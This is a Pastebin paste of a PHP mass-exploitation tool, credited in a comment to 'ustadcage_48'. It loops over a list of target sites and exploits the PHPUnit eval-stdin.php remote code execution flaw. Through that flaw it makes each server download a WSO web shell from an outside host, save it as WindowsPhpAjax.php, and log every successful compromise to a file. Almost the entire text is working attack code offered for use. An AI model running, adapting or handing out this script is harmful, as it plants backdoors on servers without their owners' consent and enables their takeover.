Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- // coded by ustadcage_48
- error_reporting(0);
- ## log save ##
- function sv($site,$ext){
- $fp = fopen("$ext.txt", 'a');
- fwrite($fp, "$site\n");
- fclose($fp);
- }
- ## color ##
- function wr($cl,$st){
- $cc .= "\033[" . $cl . "m";
- $cc .= $st . "\033[0m";
- return $cc;
- }
- echo wr("0;31"," ___ _ ,
- / (_) | | o /| / o
- \__ _ | | __ _|_ |__/ _|_ __,
- / /\/ |/ \_|/ / \_| |-----| \ | | / |
- \___/ /\_/|__/ |__/\__/ |_/|_/ | \_/|_/|_/\_/|_/
- /|
- \| Sharing [IT] Exploit\n\n");
- //sleep(2);
- print wr("0;33","[+] ReUpload File\n");
- //sleep(2);
- print wr("0;33","[+] Opening Tools ...\n");
- //sleep(1);
- print wr("0;33","[+] Please Wait ...\n\n");
- //sleep(2);
- $baca = explode("\r\n",file_get_contents($argv[1]));
- $code = "<?php copy('http://www.snapdesigns.uk/wp-includes/theme-compat/uploader.txt', 'WindowsPhpAjax.php'); ?>";
- $bugnya = "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php";
- // pecah
- foreach($baca as $shell){
- echo "[$] ".wr("0;33","$shell\n");
- shell_exec('curl -sk -d "'.$code.'" -X GET '.$shell.$bugnya.'');
- // parse
- $parse = parse_url($shell);
- $pattern = '~\w+\.php~';
- $parse = preg_replace($pattern, '', $parse);
- $url = $parse['scheme'].'://'.$parse['host'].'/vendor/phpunit/phpunit/src/Util/PHP/';
- echo $url."\n";
- if(preg_match('/GIF89a1/',file_get_contents($url."WindowsPhpAjax.php"))){
- echo "[$] ".wr("0;32","WSO Shell Successfully Uploaded\n");;
- echo "[$] ".wr("0;33","Shell")." -> ".wr("0;32",$url."WindowsPhpAjax.php\n\n");
- sv($url."WindowsPhpAjax.php","setor");
- }
- else {
- echo "[$] ".wr("0;31","WSO Tools Not Uploaded !!\n\n");
- }}
Add Comment
Please, Sign In to add comment